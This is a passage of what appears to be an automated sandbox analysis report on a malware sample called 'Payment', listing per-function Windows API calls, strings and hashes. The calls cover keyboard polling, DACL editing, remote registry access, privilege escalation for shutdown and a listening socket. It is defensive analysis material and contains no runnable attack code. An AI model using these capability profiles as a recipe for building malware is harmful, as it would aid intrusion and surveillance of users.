                                                          • SetCurrentDirectoryW.KERNEL32(00B8A5A0), ref: 00B3F46E
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B3F478
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F485
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F497
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: 517d86297233eda42dce6902bba6d391d16def302ded420bda1da71d151a2ef1
                                                          • Instruction ID: af205c32768d7807517e69abc1f750bb4b6ad00ecca23bfbae3d0bc28b7152d2
                                                          • Opcode Fuzzy Hash: 517d86297233eda42dce6902bba6d391d16def302ded420bda1da71d151a2ef1
                                                          • Instruction Fuzzy Hash: A431937290121A6ADF10ABA4EC88AFFB7ECDF49361F2401F5F950A31A0DB75DA44CA54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B28766
                                                            • Part of subcall function 00B2874A: GetLastError.KERNEL32(?,00B2822A,?,?,?), ref: 00B28770
                                                            • Part of subcall function 00B2874A: GetProcessHeap.KERNEL32(00000008,?,?,00B2822A,?,?,?), ref: 00B2877F
                                                            • Part of subcall function 00B2874A: HeapAlloc.KERNEL32(00000000,?,00B2822A,?,?,?), ref: 00B28786
                                                            • Part of subcall function 00B2874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B2879D
                                                            • Part of subcall function 00B287E7: GetProcessHeap.KERNEL32(00000008,00B28240,00000000,00000000,?,00B28240,?), ref: 00B287F3
                                                            • Part of subcall function 00B287E7: HeapAlloc.KERNEL32(00000000,?,00B28240,?), ref: 00B287FA
                                                            • Part of subcall function 00B287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B28240,?), ref: 00B2880B
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B2825B
                                                          • _memset.LIBCMT ref: 00B28270
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B2828F
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B282A0
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B282DD
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B282F9
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B28316
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B28325
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B2832C
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B2834D
                                                          • CopySid.ADVAPI32(00000000), ref: 00B28354
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B28385
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B283AB
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B283BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: e8bae5fb2cc7fd0b05a253bb3f34c4b7761277ec0ff3e20879792447cfdcb38a
                                                          • Instruction ID: d49bf8b1d958ac50a18604d8eb7669969b3fecc6ca99cf68afce140e56e4b056
                                                          • Opcode Fuzzy Hash: e8bae5fb2cc7fd0b05a253bb3f34c4b7761277ec0ff3e20879792447cfdcb38a
                                                          • Instruction Fuzzy Hash: 6061607190121AEFDF00DF94DC44AEEBBB9FF04700F1881A9F919A7291DB719A05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                          • API String ID: 0-4052911093
                                                          • Opcode ID: ad0785a44bd3acc3c3c293e2fa54e95330e1b116b8831b2dc634109d61db622d
                                                          • Instruction ID: 42e210da9a3521ef8b895e7e3392cac18c344d019184606e892d877d97eb8f94
                                                          • Opcode Fuzzy Hash: ad0785a44bd3acc3c3c293e2fa54e95330e1b116b8831b2dc634109d61db622d
                                                          • Instruction Fuzzy Hash: 98728371E002699BDF24CF59D8807AEB7F5FF68310F1485AAE849EB290D7709D81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B50038,?,?), ref: 00B510BC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B50737
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B507D6
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B5086E
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B50AAD
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B50ABA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: a17b8dd459a02eaf96249e03f5c4c9922d9fcf3642c2b2879a18b0cc99a322ea
                                                          • Instruction ID: 327387beefb0aee12d741624be1da54d81979cfac5f50ec9decdedf343a7a325
                                                          • Opcode Fuzzy Hash: a17b8dd459a02eaf96249e03f5c4c9922d9fcf3642c2b2879a18b0cc99a322ea
                                                          • Instruction Fuzzy Hash: BFE14F31204311AFCB14EF29C995E6BBBE4EF89714F0489ADF85AD72A1DA30ED05CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00B30241
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00B302C2
                                                          • GetKeyState.USER32(000000A0), ref: 00B302DD
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00B302F7
                                                          • GetKeyState.USER32(000000A1), ref: 00B3030C
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00B30324
                                                          • GetKeyState.USER32(00000011), ref: 00B30336
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00B3034E
                                                          • GetKeyState.USER32(00000012), ref: 00B30360
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00B30378
                                                          • GetKeyState.USER32(0000005B), ref: 00B3038A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 7bc43b85ee33e862b594ca17788d8d2bea617dbb18e9870178aadefbc36a9548
                                                          • Instruction ID: c8adc93a767c997359e0e10040d70548391fb7d83e71543f6542a33afb9f9324
                                                          • Opcode Fuzzy Hash: 7bc43b85ee33e862b594ca17788d8d2bea617dbb18e9870178aadefbc36a9548
                                                          • Instruction Fuzzy Hash: BD41BB645247CA6EFF31AA6498283B6FEE0EF15340F2840DDD9C6471C2EBD499C487A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • CoInitialize.OLE32 ref: 00B48718
                                                          • CoUninitialize.OLE32 ref: 00B48723
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00B62BEC,?), ref: 00B48783
                                                          • IIDFromString.OLE32(?,?), ref: 00B487F6
                                                          • VariantInit.OLEAUT32(?), ref: 00B48890
                                                          • VariantClear.OLEAUT32(?), ref: 00B488F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: eb273927c136da39647da07d06a4167e52adf6f237dd3a0db24025ea147b7c6f
                                                          • Instruction ID: 6a502ac7dd529e2640ec942bfd5e1b8031c15e5f5026bb86b801d3fe29330127
                                                          • Opcode Fuzzy Hash: eb273927c136da39647da07d06a4167e52adf6f237dd3a0db24025ea147b7c6f
                                                          • Instruction Fuzzy Hash: 57619D70608311AFD710EF24C988B6FBBE4EF48714F104899F9859B2A1DB70EE44DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 393c33e5466b0209e87aa078b45d1cf796549689950a5a13d5a917deb74e321c
                                                          • Instruction ID: 71cb6fbb17ee0f7ef8be14b1031d9db64c6a37197ebe2e1ca07faaf242a58949
                                                          • Opcode Fuzzy Hash: 393c33e5466b0209e87aa078b45d1cf796549689950a5a13d5a917deb74e321c
                                                          • Instruction Fuzzy Hash: B9217F35200221AFDB10AF64ED49B7AB7A8EF14711F1080AAF946DB2B1CF75AD11DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AD48A1,?,?,00AD37C0,?), ref: 00AD48CE
                                                            • Part of subcall function 00B34CD3: GetFileAttributesW.KERNEL32(?,00B33947), ref: 00B34CD4
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B33ADF
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B33B87
                                                          • MoveFileW.KERNEL32(?,?), ref: 00B33B9A
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B33BB7
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B33BD9
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B33BF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: d9ea81b4e13086c877b3e513b7d2c6287873f0f4e0dd6a87f194a39ac3ecbd7b
                                                          • Instruction ID: d4a2c4e47f74febb49f2f8cfcad79327b941eac8a1ae2d1f138e8b44b8f63fdc
                                                          • Opcode Fuzzy Hash: d9ea81b4e13086c877b3e513b7d2c6287873f0f4e0dd6a87f194a39ac3ecbd7b
                                                          • Instruction Fuzzy Hash: 9551403180525D9ACF15EBA0DE929FEB7F9AF14700F6441AAE442771A1EF316F09CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B3F6AB
                                                          • Sleep.KERNEL32(0000000A), ref: 00B3F6DB
                                                          • _wcscmp.LIBCMT ref: 00B3F6EF
                                                          • _wcscmp.LIBCMT ref: 00B3F70A
                                                          • FindNextFileW.KERNEL32(?,?), ref: 00B3F7A8
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F7BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 713712311-438819550
                                                          • Opcode ID: 39fed09e37ee454a47ee11dd66207bfc8440def37fd8d0cef3e48b3cf3590dff
                                                          • Instruction ID: 9616fe5beb6766f5b41331a4a48c592a887674b616addc972266aeb5724dbc13
                                                          • Opcode Fuzzy Hash: 39fed09e37ee454a47ee11dd66207bfc8440def37fd8d0cef3e48b3cf3590dff
                                                          • Instruction Fuzzy Hash: 15412B71D0021A9BDF15EF64CD89AFEBBF4EF05350F2445A6E815A32A1EB309E44CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-1546025612
                                                          • Opcode ID: 084707f83d46cde881e055f037c5cd6fbcaa3cc60d89f207a292e987e710a147
                                                          • Instruction ID: 16e535056cdece9b66a54e6bbc6f06cdfb1bb3c9334b94dada0297cd1ae3f9d1
                                                          • Opcode Fuzzy Hash: 084707f83d46cde881e055f037c5cd6fbcaa3cc60d89f207a292e987e710a147
                                                          • Instruction Fuzzy Hash: 50A27E70E0429ACBDF24CF59C9907EEB7B5FB58314F6481A9D856A7280DB309EC1CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: f4f4dfe96e1e1bc765527b5d39ff22fb406be82fe41ebebc000cddcfdb73e40e
                                                          • Instruction ID: f1c1cfa2f550e79fcf892ca352afd41793cd16708e95f1cb3ad1333f963d7a6f
                                                          • Opcode Fuzzy Hash: f4f4dfe96e1e1bc765527b5d39ff22fb406be82fe41ebebc000cddcfdb73e40e
                                                          • Instruction Fuzzy Hash: DF128970E00619DBDF14DFA5EA85AAEB7F5FF48304F108269E406A7292EB35AD11CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B28D0D
                                                            • Part of subcall function 00B28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B28D3A
                                                            • Part of subcall function 00B28CC3: GetLastError.KERNEL32 ref: 00B28D47
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00B3549B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: 765b6feb53dae8a0fcbf98f73ce8eed9af59f5beb8eb01d15a8a18768e597d93
                                                          • Instruction ID: f224638e2e282303c3b0cf9b7b36339c3bd5e156d5a6723d76373b1a86d825bb
                                                          • Opcode Fuzzy Hash: 765b6feb53dae8a0fcbf98f73ce8eed9af59f5beb8eb01d15a8a18768e597d93
                                                          • Instruction Fuzzy Hash: DC01F771655B126AF73C6678EC8ABBBB2D8EB04753F3401E1FD4BD22D7EA915C808190
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B465EF
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B465FE
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00B4661A
                                                          • listen.WSOCK32(00000000,00000005), ref: 00B46629
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B46643
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00B46657
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 024cde72ab6543e902b3b9039d8de9da9af20830c6a299db831445a46828cc64
                                                          • Instruction ID: ffd25791082ff86cca11ef6d2483c070a76b9af801ec8722bf4294fbcd36604c
                                                          • Opcode Fuzzy Hash: 024cde72ab6543e902b3b9039d8de9da9af20830c6a299db831445a46828cc64
                                                          • Instruction Fuzzy Hash: 1D21CE31200210AFCB00AF24D985BBEB7F9EF49321F11819AE956E73E1CB30AE019B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF0FF6: std::exception::exception.LIBCMT ref: 00AF102C
                                                            • Part of subcall function 00AF0FF6: __CxxThrowException@8.LIBCMT ref: 00AF1041
                                                          • _memmove.LIBCMT ref: 00B2062F
                                                          • _memmove.LIBCMT ref: 00B20744
                                                          • _memmove.LIBCMT ref: 00B207EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1300846289-0
                                                          • Opcode ID: 97647c197972dd0578fe9252f85b2fdc7464b32642f5f9606109babd79aa4ec6
                                                          • Instruction ID: 7fa29592190206c1aa4106b95e5c8fa80aeea3f45ce3b371341957125d86f381
                                                          • Opcode Fuzzy Hash: 97647c197972dd0578fe9252f85b2fdc7464b32642f5f9606109babd79aa4ec6
                                                          • Instruction Fuzzy Hash: 20028F70E00219DBCF04DF65E981AAEBBF5EF44300F1480A9E80ADB266EB35DD55CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AD19FA
                                                          • GetSysColor.USER32(0000000F), ref: 00AD1A4E
                                                          • SetBkColor.GDI32(?,00000000), ref: 00AD1A61
                                                            • Part of subcall function 00AD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AD12D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
